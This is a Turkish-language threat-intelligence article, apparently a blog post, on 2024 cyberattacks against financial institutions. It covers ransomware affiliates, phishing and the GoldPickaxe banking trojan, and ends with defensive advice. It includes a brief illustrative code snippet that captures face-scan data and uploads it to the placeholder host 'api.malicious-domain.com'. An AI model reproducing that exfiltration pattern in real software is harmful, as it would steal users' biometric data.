Giriş:
Finans sektörü, siber suçlular ve devlet destekli gruplar için her zaman bir hedef olmuştur. 2024 yılında, zero-day zafiyetleri, tedarik zinciri zayıflıkları ve gelişmiş kötü amaçlı yazılımları istismar eden saldırılarda dikkat çekici bir artış yaşanmaktadır. Bu durum, finans kurumlarının siber güvenlik stratejilerini yeniden gözden geçirmelerini gerekli kılmaktadır.
Teknik Açıklamalar:
Saldırıların çoğu, Initial Access Brokers (IAB’ler) ve Ransomware-as-a-Service (RaaS) gibi işbirlikçi modellerin benimsenmesi ile gerçekleştirilmektedir. Bu yöntemler, siber suçluların hedeflerini genişletmelerine ve etkilerini artırmalarına olanak tanır. Örneğin, TA577 ve Scattered Spider gibi gruplar, ağları ihlal edip bu erişimleri fidye yazılımı operatörlerine satma konusunda uzmanlaşmıştır.
Gelişmiş saldırı yöntemleri arasında, Cleo dosya aktarım yazılımındaki zafiyetlerin kullanımı ve Okta giriş portalını taklit eden phishing kampanyaları bulunmaktadır. Erişim sağlandıktan sonra, RansomHub gibi özel ransomware türleri, EDRKillShifter gibi araçlarla son nokta tespit sistemlerini devre dışı bırakmak için uygulanmaktadır.
Örnekler:
Özellikle GoldFactory adlı bir saldırı grubu, bankacılık sistemleri için büyük tehditler oluşturan GoldPickaxe Trojan’ını geliştirmiştir. Bu kötü amaçlı yazılım, Asya-Pasifik bölgesinde, özellikle Vietnam ve Tayland gibi ülkelerde iOS ve Android kullanıcılarını hedef alır.
GoldPickaxe’in iOS varyantı, Apple TestFlight platformları üzerinden dağıtılarak biyometrik verileri toplayarak güvenlik kontrollerini aşan derin sahte (deepfake) kimlikler oluşturur. Bu yazılımın kodu, cihazdaki API’lerle entegre edilmiştir ve yüz taramalarını ele geçirerek komuta kontrol (C2) sunucularına aktarır.
Bir kod örneği verelim:
!
“`
func captureBiometricData() {
let faceScan = ARFaceTracking.getFacialMetrics()
C2Server.upload(data: faceScan, endpoint: “api.malicious-domain.com/face-auth”)
}
“`
Önlemler & En İyi Uygulamalar:
Finansal kurumların, zafiyetlerden korunmak için öncelikle güncel yamaları uygulamaları ve çok faktörlü kimlik doğrulama (MFA) çözümlerini etkin bir şekilde kullanmaları önemlidir. Özellikle, Adversary-in-the-Middle (AiTM) phishing kitlerine karşı dirençli çözümler geliştirmelidirler. Ağ segmentasyonu ve davranışsal analiz araçları, olağandışı biyometrik veri transferlerini tespit etmek için kullanılabilir. APT ve siber suçluların araç ve altyapı paylaşımındaki artış, sektörel tehdit istihbaratının paylaşımını daha da önemli hale getirmektedir.
Sonuç & Özet:
Finans sektöründeki siber tehditler, giderek daha karmaşık ve çok katmanlı hale gelmektedir. Gelişmiş kötü amaçlı yazılımlar ve işbirlikçi siber suç modelleri, bu alandaki saldırıların etkisini artırmaktadır. Kurumların, olası zafiyetlere karşı dikkatli olunması, güvenlik en iyi uygulamalarının uygulanması ve tehdit istihbaratının paylaşılması gerektiği vurgulanmalıdır.
Kaynakça:
Sekoia. APT33 Collaboration with Ransomware Affiliates.
Cyber Security News. Cyber Threat Actors Leveraging Exploits To Attack Financial Sector With Advanced Malware. [Collection]
About the Author
